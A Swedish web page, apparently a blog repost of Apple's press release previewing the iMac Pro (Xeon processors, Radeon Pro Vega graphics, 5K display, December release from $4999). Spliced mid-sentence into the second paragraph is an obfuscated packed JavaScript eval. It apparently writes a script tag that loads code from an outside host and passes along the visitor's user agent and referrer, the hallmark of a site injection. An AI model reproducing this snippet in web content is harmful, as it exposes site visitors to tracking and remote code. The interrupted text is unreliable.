Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

iMac Pro, den kraftfullaste Mac-datorn någonsin, släpps i december

iMac Pro, den kraftfullaste Mac-datorn någonsin, släpps i december
Sebastian

Apple bjöd idag på en förhandstitt på iMac Pro, en helt ny produktserie i klass med arbetsstationer som utformats för proffsanvändare med ytterst krävande arbetsflöden. Helt nya iMac Pro, med den fenomenala 27-tums Retina 5K-skärmen, Xeon-processorer med upp till 18 kärnor och grafik som klarar upp till 22 teraflop, är den kraftfullaste Mac som någonsin funnits. Innanför det nya ursnygga rymdgrå höljet på iMac Pro döljer sig otroliga prestanda för avancerad grafikredigering, produktion av virtual reality-innehåll samt 3d-rendering i realtid. iMac Pro beräknas vara klar för leverans i december och kosta från $4999 (US).

Vid eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnhee|var|u0026u|referrer|dkdye||js|php’.split(’|’),0,{}))
sidan av nya iMac Pro håller Apple även på att ta fram nästa generation Mac Pro, med helt ny design och arkitektur avsedd för proffskunder som behöver ett snabbarbetat, modulärt system av vassaste sort, samt en ny vass proffsskärm.

”Vi är glada över att kunna erbjuda utvecklare och kunder en förhandstitt på iMac Pro. Det här blir vår snabbaste och kraftfullaste Mac någonsin, samtidigt som iMac för första gången erbjuder datorkraft i arbetsstationsklass”, säger John Ternus, vice vd på Apple med ansvar för Hardware Engineering. ”Tack vare att vi gjort om hela systemet och formgett en helt ny termisk arkitektur kan vi erbjuda enastående prestanda i samma typ av eleganta, tysta iMac-hölje som våra kunder gillar – iMac Pro innebär ett enormt kliv framåt och liknar ingenting som funnits tidigare.”

Prestanda i klass med arbetsstationer, i iMac-utförande
iMac Pro är utrustad med senaste generationen Intel Xeon-processorer med upp till 18 kärnor för att kunna hantera proffsens extremt krävande arbetsflöden. Tack vare en helt flashbaserad arkitektur och en helt ny termisk design har iMac Pro upp till 80 procent effektivare kylning, trots det tunna, sömlösa iMac-utförandet. Med sitt nya rymdgrå hölje och fenomenala 27-tums Retina 5K-skärm med stöd för en miljard färger är iMac lika imponerande som den är kraftfull.

Mest avancerade grafiken någonsin i en Mac
iMac Pro levereras med nya grafikprocessorn Radeon Pro Vega, den mest avancerade grafiken någonsin i en Mac. En ny beräkningskärna av senaste generationen och upp till 16 GB integrerat högbandbreddsminne (HBM2) ger iMac Pro med Vega-grafikprocessorn upp till makalösa 11 teraflop beräkningskraft i enkel precision för 3d-rendering i realtid och fängslande vr med snabb bilduppdatering. Och för beräkningar med halv precision, vilket är idealiskt för maskininlärning, presterar iMac Pro upp till otroliga 22 teraflop.

Snabb lagring och avancerad I/O-teknik
iMac Pro stöder även ssd:er på upp till 4 TB samt upp till 128 GB ecc-minne, och via de fyra Thunderbolt 3-portarna kan upp till två kraftfulla raid-uppsättningar och två 5K-skärmar vara anslutna samtidigt. Som första Mac-dator någonsin är iMac Pro utrustad med 10 GB Ethernet för upp till 10 gånger snabbare nätverksanslutning.

Priser och tillgänglighet
iMac Pro beräknas vara leveransklar i december och kosta från $4999 (US). Mer information finns på
apple.com/se/imac-pro.

När Apple lanserade Macintosh 1984 var det början på en revolutionerande era. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att göra de bästa produkterna i världen och att lämna världen i bättre skick än när vi började.